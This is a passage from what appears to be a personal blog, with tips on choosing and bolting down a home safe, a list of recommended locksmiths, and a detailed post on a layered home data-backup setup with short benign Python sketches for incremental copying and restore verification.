  • Avoid any digital combination safe that has a mechanical override lock. Instead of having one good mechanical lock, you now have a digital lock and a crap mechanical lock. The security of the safe is limited by the lower of the two.
  • Look for a good lever lock. At prices acceptable to most householders, a good lever lock will provide the best security.
  • Decide if you are protecting against fire and/or theft. A lot of “fire safes” have extremely poor security. Burglary is far more common than house fire. My safe protects against theft, and the small fire chest inside protects truly irreplaceable objects.
  • Avoid any safe that a single person can easily pick up. You don’t need something that weighs 750kg, but 50kg+ makes things a lot more awkward for burglars.
  • Make sure you can bolt the safe to the floor and/or wall. A 50kg safe attached to a concrete floor with 4 expanding bolts is going to be as hard to move as a 500kg safe.
  • Make sure it is big enough to hold your stuff. If it can’t hold the thing you need to protect, it has no purpose. A lot of smaller safes can’t take 15.6″ laptops.
  • Make sure it is accessible enough that you actually use it. If it is hidden away, you are unlikely to ever use it. If your stuff isn’t in the safe, it doesn’t matter how secure the safe is.

Recommended contacts

The following locksmiths and safe engineers are known to me, and whilst I have never had to use their services, I know they do good work.

Jason Jones at Kelocks (UK)

Stuart Game at BBS Safe Engineers (UK)

Nigel Tolley at Discreet Security Solutions (UK)

Jord Knapp at Knapp Junior (NL)

Emiel van Kessel at De Slotenspecialist (NL)

Oliver Diederichsen at Tresoroeffnung (DE)

Don’t lose your data…

A bit of a different subject to normal posts. I’ve seen a lot of tweets recently from people who have lost irreplaceable data because they haven’t got a backup or their backups weren’t working properly.

Bruce Schneier recently said on his blog:

Remember the rule: no one ever wants backups, but everyone always wants restores.

This is the truth – it isn’t the backup that matters, it is the restore. You need to test it. If you are serious about your data, back it up!

I had a scare last year when my laptop’s SSD failed without warning, and then I found out my backups hadn’t been working properly. Luckily my elite data recovery skills meant I could get the data back.

I took this as a chance to implement a robust, dependable backup system that I knew I could rely on.

Goals

You need to decide what you are protecting:

  • Photos – these to me are genuinely irreplaceable.
  • Projects – code, notes, datasheets, data etc. I could redo these, but it would take time and effort.
  • Emails – again, I would have no way of recreating these

And what you aren’t:

  • Media – TV, films, music. I’m not bothered about these – I can get them again
  • Programs and OS – I can download these again.

At this point I should say that I am not a fan of “bare metal restore” or full disk imaging. Why?

  • Individual files are not easily accessible – it is far harder to determine if things are working correctly.
  • The file formats are often proprietary and undocumented – if it isn’t working, I am going to have a hard time fixing that.
  • Bare metal restores are difficult onto different hardware – they don’t handle changes well, even a different sized partition complicates this.
  • I would hope I need to restore infrequently enough that re-installing my OS and programs is a welcome clean-out rather than inconvenience.

You need to decide what you are protecting against:

  • Disk failure – this seems to be the biggest threat to my data. One external HD and two mSATA SSDs have failed in the past two years. My view is now that no single storage device can be trusted, especially SSDs
  • Theft – my laptop, iPad, server or backup drives could be stolen.
  • Idiocy and mistakes – I could delete something I didn’t mean to at any point in time. Or simply change something I didn’t mean to.

It would be fair to say, my solution is belt and braces and then some.

Central storage

Instead of trusting my data to my individual mobile devices and backing those up, the primary store of data is on a central server located in our house.

This is an HP N40L server (these are often available for £100 with a cashback offer), running 2x3TB drives in a RAID1 configuration. RAID1 is otherwise known as “mirroring” and I have implemented it in software (which means that I can put the drives in any machine, unlike with hardware RAID where the chipset must be the same). All RAID1 does is protect against drive failure – nothing else. If the machine is stolen, I lose my data. If I delete my data, I lose my data. Don’t fall into the trap that many do and call RAID1 a backup. I have done it for convenience and because these large drives are currently unproven in terms of reliability.

Although this is the primary store of data, I need to be able to work with this data quickly and when away from the house. Therefore everything is synced between the server and mobile devices periodically.

For Windows machines, I use SyncBack Pro to do this in near-realtime. It’s very effective and bi-directional.

Central storage backup

I run two of my own backups on the central storage.

Firstly, on a daily basis, an incremental backup is made from the 2x3TB RAID1 array to an external 4TB USB drive. The incremental backup means I have 90 days of history on all of my files available immediately. The external USB drive means that there is a degree of isolation between the server and drive, and I can quickly remove it from the house if need be.

Secondly, at the beginning of each month, I plug in a second external 4TB USB drive. Again, this is an incremental backup, but less frequent. I then remove the drive and store it in my substantial safe. This protects me against hardware failure – even if the server decides to send 240V into all connected devices, this drive is not connected to the machine all of the time. It also protects me from theft and fire to a degree – only a determined burglar could open the safe.

Both of these use SyncBack Pro as well.
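The core idea of an incremental run is to copy only what changed since the last run, and it fits in a short sketch. This does not describe SyncBack Pro's internals. `incremental_backup` is a hypothetical, simplified helper that judges “changed” by modification time and copies those files into a fresh snapshot folder. Keeping history this way means keeping an initial full copy plus every increment. Pruning old increments without a full baseline would lose files, which is one reason to use a proper tool.

```python
import shutil
from pathlib import Path


def incremental_backup(source: Path, snapshot: Path, last_run: float) -> list[Path]:
    """Copy files under source modified after last_run (a Unix timestamp)
    into the snapshot folder, keeping their relative paths.

    last_run=0.0 copies everything, i.e. a full backup.
    """
    copied = []
    for path in source.rglob("*"):
        if path.is_file() and path.stat().st_mtime > last_run:
            rel = path.relative_to(source)
            target = snapshot / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, target)  # copy2 also preserves timestamps
            copied.append(rel)
    return sorted(copied)
```

A first run with `last_run=0.0` gives the full copy. Each later run passes the time of the previous run and writes to a new, dated snapshot folder.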

Offsite central storage backup

The entire central server is then backed up to the cloud using Crashplan. The most important feature of Crashplan is that it is offsite. Whatever happens to the hardware in the house, Crashplan will have the data.

Crashplan also allows friends and family to back up to my server and take advantage of all the other backups I perform.

Once a year I back up photos to a portable USB hard drive and give this to a trusted third party (parents) to look after.

Offsite laptop backup

Not content with that, I run Backblaze on my personal laptop. Backblaze is a competitor to Crashplan. This backs up everything on the laptop to the cloud.

(I’m not actually quite this paranoid – I used to use Backblaze on our old “server” running Windows 7. When I upgraded to the HP N40L, I found Backblaze doesn’t run on Windows server OS, so had to switch to Crashplan. I have another 18 months of Backblaze subscription left to use).

Dropbox and Github

The final aspect of backup is for all of my project work. All of it is on Dropbox. This isn’t primarily for backup – it is for access from wherever I want. All of my code goes onto Github.

Encryption

A number of the devices mentioned above are encrypted using Truecrypt. A number of more sensitive documents are encrypted before being sent to the cloud.

Testing

I regularly check that all of the above is working. I recently had an SSD failure, and initially noticed that one of the above mechanisms wasn’t working. It was quickly fixed.
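One way to test a restore is to compare it against the original file by file. The sketch below hashes every file in two folder trees with SHA-256 and reports what is missing, extra or changed. `tree_hashes` and `verify_restore` are illustrative helpers, not features of any of the backup tools mentioned.

```python
import hashlib
from pathlib import Path


def tree_hashes(root: Path) -> dict[str, str]:
    """Map each file's relative path (with / separators) to its SHA-256 hex digest."""
    hashes = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 20), b""):  # 1 MiB at a time
                    h.update(chunk)
            hashes[path.relative_to(root).as_posix()] = h.hexdigest()
    return hashes


def verify_restore(original: Path, restored: Path) -> dict[str, list[str]]:
    """List files missing from, extra in, or different in the restored copy."""
    a, b = tree_hashes(original), tree_hashes(restored)
    return {
        "missing": sorted(a.keys() - b.keys()),
        "extra": sorted(b.keys() - a.keys()),
        "changed": sorted(k for k in a.keys() & b.keys() if a[k] != b[k]),
    }
```

Restoring a sample folder to a scratch location and checking that all three lists are empty is a cheap, repeatable test.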

Conclusion

This might be paranoid, but all this data is vital to me.

At the moment, my photos are stored:

  1. On my laptop
  2. On the RAID array in the server
  3. On the permanently connected USB drive
  4. On the once-a-month USB drive
  5. On the offsite portable USB drive
  6. On Crashplan
  7. On Backblaze

The chance of all of this going wrong at the same time is virtually zero.
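The “virtually zero” can be made concrete. Assume each copy fails independently; the whole calculation rests on that assumption. The chance of losing all seven copies in the same year is then the product of the individual chances. The per-copy probabilities below are invented for illustration, not measured.

```python
from math import prod

# Hypothetical yearly chance of losing each copy of the photos, in the order
# listed above. These numbers are invented for illustration.
annual_loss = {
    "laptop": 0.05,
    "server RAID array": 0.01,
    "permanently connected USB drive": 0.03,
    "once-a-month USB drive": 0.02,
    "offsite portable USB drive": 0.02,
    "Crashplan": 0.01,
    "Backblaze": 0.01,
}


def p_all_lost(probabilities) -> float:
    """Chance every copy is lost in the same year, ASSUMING independence."""
    return prod(probabilities)


print(f"{p_all_lost(annual_loss.values()):.1e}")  # 6.0e-13
```

Independence is the weak point. The laptop, the server and the USB drives usually sit in the same house, so one fire or burglary could hit several at once. That is why the offsite copies matter.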